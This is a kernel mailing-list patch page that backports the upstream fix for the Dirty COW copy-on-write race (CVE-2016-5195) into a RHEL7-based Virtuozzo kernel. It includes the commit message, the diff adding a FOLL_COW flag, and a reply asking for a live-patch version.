[Devel,RHEL7,COMMIT] ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()

Submitted by Konstantin Khorenko on Oct. 20, 2016, 10:30 a.m.

Details

Message ID 201610201030.u9KAUZP4010456@finist_cl7.x64_64.work.ct
State New
Series "ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()"
Headers show

Commit Message

Konstantin Khorenko Oct. 20, 2016, 10:30 a.m.
The commit is pushed to "branch-rh7-3.10.0-327.36.1.vz7.19.x-ovz" and will appear at https://src.openvz.org/scm/ovz/vzkernel.git
after rh7-3.10.0-327.36.1.vz7.19.2
------>
commit 1e30f91f7d15f9154fd2238932ec92fae262e146
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Thu Oct 20 14:30:35 2016 +0400

    ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
    
    commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
    
    This is an ancient bug that was actually attempted to be fixed once
    (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
    get_user_pages() race for write access") but that was then undone due to
    problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
    
    In the meantime, the s390 situation has long been fixed, and we can now
    fix it by checking the pte_dirty() bit properly (and do it better).  The
    s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
    software dirty bits") which made it into v3.9.  Earlier kernels will
    have to look at the page state itself.
    
    Also, the VM has become more scalable, and what used a purely
    theoretical race back then has become easier to trigger.
    
    To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
    we already did a COW" rather than play racy games with FOLL_WRITE that
    is very fundamental, and then use the pte dirty flag to validate that
    the FOLL_COW flag is still valid.
    
    Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
    Acked-by: Hugh Dickins <hughd@google.com>
    Reviewed-by: Michal Hocko <mhocko@suse.com>
    Cc: Andy Lutomirski <luto@kernel.org>
    Cc: Kees Cook <keescook@chromium.org>
    Cc: Oleg Nesterov <oleg@redhat.com>
    Cc: Willy Tarreau <w@1wt.eu>
    Cc: Nick Piggin <npiggin@gmail.com>
    Cc: Greg Thelen <gthelen@google.com>
    Cc: stable@vger.kernel.org
    Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
    [wt: s/gup.c/memory.c; s/follow_page_pte/follow_page_mask;
         s/faultin_page/__get_user_page]
    Signed-off-by: Willy Tarreau <w@1wt.eu>
    
    https://jira.sw.ru/browse/PSBM-54065
    https://lkml.org/lkml/2016/10/19/860
    
    CVE-2016-5195: A race condition was found in the way the Linux kernel's memory
    subsystem handled the copy-on-write (COW) breakage of private read-only memory
    mappings. An unprivileged local user could use this flaw to gain write access
    to otherwise read-only memory mappings and thus increase their privileges on
    the system.
    
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
    https://access.redhat.com/security/cve/CVE-2016-5195
    
    Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
---
 include/linux/mm.h |  1 +
 mm/memory.c        | 14 ++++++++++++--
 2 files changed, 13 insertions(+), 2 deletions(-)

Patch hide | download patch | download mbox

diff --git a/include/linux/mm.h b/include/linux/mm.h
index d5f8897..597dcc1 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -1948,6 +1948,7 @@  static inline struct page *follow_page(struct vm_area_struct *vma,
 #define FOLL_NUMA	0x200	/* force NUMA hinting page fault */
 #define FOLL_MIGRATION	0x400	/* wait for page to replace migration entry */
 #define FOLL_TRIED	0x800	/* a retry, previous pass started an IO */
+#define FOLL_COW	0x4000	/* internal GUP flag */
 
 typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
 			void *data);
diff --git a/mm/memory.c b/mm/memory.c
index f13a4d0..d6fcde2 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -1451,6 +1451,16 @@  int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
 }
 EXPORT_SYMBOL_GPL(zap_vma_ptes);
 
+/*
+ * FOLL_FORCE can write to even unwritable pte's, but only
+ * after we've gone through a COW cycle and they are dirty.
+ */
+static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
+{
+	return pte_write(pte) ||
+		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
+}
+
 /**
  * follow_page_mask - look up a page descriptor from a user-virtual address
  * @vma: vm_area_struct mapping @address
@@ -1572,7 +1582,7 @@  split_fallthrough:
 	}
 	if ((flags & FOLL_NUMA) && pte_numa(pte))
 		goto no_page;
-	if ((flags & FOLL_WRITE) && !pte_write(pte))
+	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
 		goto unlock;
 
 	page = vm_normal_page(vma, address, pte);
@@ -1884,7 +1894,7 @@  long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
 				 */
 				if ((ret & VM_FAULT_WRITE) &&
 				    !(vma->vm_flags & VM_WRITE))
-					foll_flags &= ~FOLL_WRITE;
+					foll_flags |= FOLL_COW;
 
 				cond_resched();
 			}

Comments

Konstantin Khorenko Oct. 20, 2016, 10:33 a.m.
Zhenya, please prepare a ReadyKernel patch for it.

https://readykernel.com/

--
Best regards,

Konstantin Khorenko,
Virtuozzo Linux Kernel Team

On 10/20/2016 01:30 PM, Konstantin Khorenko wrote:
> The commit is pushed to "branch-rh7-3.10.0-327.36.1.vz7.19.x-ovz" and will appear at https://src.openvz.org/scm/ovz/vzkernel.git
> after rh7-3.10.0-327.36.1.vz7.19.2
> ------>
> commit 1e30f91f7d15f9154fd2238932ec92fae262e146
> Author: Linus Torvalds <torvalds@linux-foundation.org>
> Date:   Thu Oct 20 14:30:35 2016 +0400
>
>     ms/mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
>
>     commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
>
>     This is an ancient bug that was actually attempted to be fixed once
>     (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
>     get_user_pages() race for write access") but that was then undone due to
>     problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
>
>     In the meantime, the s390 situation has long been fixed, and we can now
>     fix it by checking the pte_dirty() bit properly (and do it better).  The
>     s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
>     software dirty bits") which made it into v3.9.  Earlier kernels will
>     have to look at the page state itself.
>
>     Also, the VM has become more scalable, and what used a purely
>     theoretical race back then has become easier to trigger.
>
>     To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
>     we already did a COW" rather than play racy games with FOLL_WRITE that
>     is very fundamental, and then use the pte dirty flag to validate that
>     the FOLL_COW flag is still valid.
>
>     Reported-and-tested-by: Phil "not Paul" Oester <kernel@linuxace.com>
>     Acked-by: Hugh Dickins <hughd@google.com>
>     Reviewed-by: Michal Hocko <mhocko@suse.com>
>     Cc: Andy Lutomirski <luto@kernel.org>
>     Cc: Kees Cook <keescook@chromium.org>
>     Cc: Oleg Nesterov <oleg@redhat.com>
>     Cc: Willy Tarreau <w@1wt.eu>
>     Cc: Nick Piggin <npiggin@gmail.com>
>     Cc: Greg Thelen <gthelen@google.com>
>     Cc: stable@vger.kernel.org
>     Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
>     [wt: s/gup.c/memory.c; s/follow_page_pte/follow_page_mask;
>          s/faultin_page/__get_user_page]
>     Signed-off-by: Willy Tarreau <w@1wt.eu>
>
>     https://jira.sw.ru/browse/PSBM-54065
>     https://lkml.org/lkml/2016/10/19/860
>
>     CVE-2016-5195: A race condition was found in the way the Linux kernel's memory
>     subsystem handled the copy-on-write (COW) breakage of private read-only memory
>     mappings. An unprivileged local user could use this flaw to gain write access
>     to otherwise read-only memory mappings and thus increase their privileges on
>     the system.
>
>     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195
>     https://access.redhat.com/security/cve/CVE-2016-5195
>
>     Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
> ---
>  include/linux/mm.h |  1 +
>  mm/memory.c        | 14 ++++++++++++--
>  2 files changed, 13 insertions(+), 2 deletions(-)
>
> diff --git a/include/linux/mm.h b/include/linux/mm.h
> index d5f8897..597dcc1 100644
> --- a/include/linux/mm.h
> +++ b/include/linux/mm.h
> @@ -1948,6 +1948,7 @@ static inline struct page *follow_page(struct vm_area_struct *vma,
>  #define FOLL_NUMA	0x200	/* force NUMA hinting page fault */
>  #define FOLL_MIGRATION	0x400	/* wait for page to replace migration entry */
>  #define FOLL_TRIED	0x800	/* a retry, previous pass started an IO */
> +#define FOLL_COW	0x4000	/* internal GUP flag */
>
>  typedef int (*pte_fn_t)(pte_t *pte, pgtable_t token, unsigned long addr,
>  			void *data);
> diff --git a/mm/memory.c b/mm/memory.c
> index f13a4d0..d6fcde2 100644
> --- a/mm/memory.c
> +++ b/mm/memory.c
> @@ -1451,6 +1451,16 @@ int zap_vma_ptes(struct vm_area_struct *vma, unsigned long address,
>  }
>  EXPORT_SYMBOL_GPL(zap_vma_ptes);
>
> +/*
> + * FOLL_FORCE can write to even unwritable pte's, but only
> + * after we've gone through a COW cycle and they are dirty.
> + */
> +static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
> +{
> +	return pte_write(pte) ||
> +		((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> +}
> +
>  /**
>   * follow_page_mask - look up a page descriptor from a user-virtual address
>   * @vma: vm_area_struct mapping @address
> @@ -1572,7 +1582,7 @@ split_fallthrough:
>  	}
>  	if ((flags & FOLL_NUMA) && pte_numa(pte))
>  		goto no_page;
> -	if ((flags & FOLL_WRITE) && !pte_write(pte))
> +	if ((flags & FOLL_WRITE) && !can_follow_write_pte(pte, flags))
>  		goto unlock;
>
>  	page = vm_normal_page(vma, address, pte);
> @@ -1884,7 +1894,7 @@ long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
>  				 */
>  				if ((ret & VM_FAULT_WRITE) &&
>  				    !(vma->vm_flags & VM_WRITE))
> -					foll_flags &= ~FOLL_WRITE;
> +					foll_flags |= FOLL_COW;
>
>  				cond_resched();
>  			}
> .
>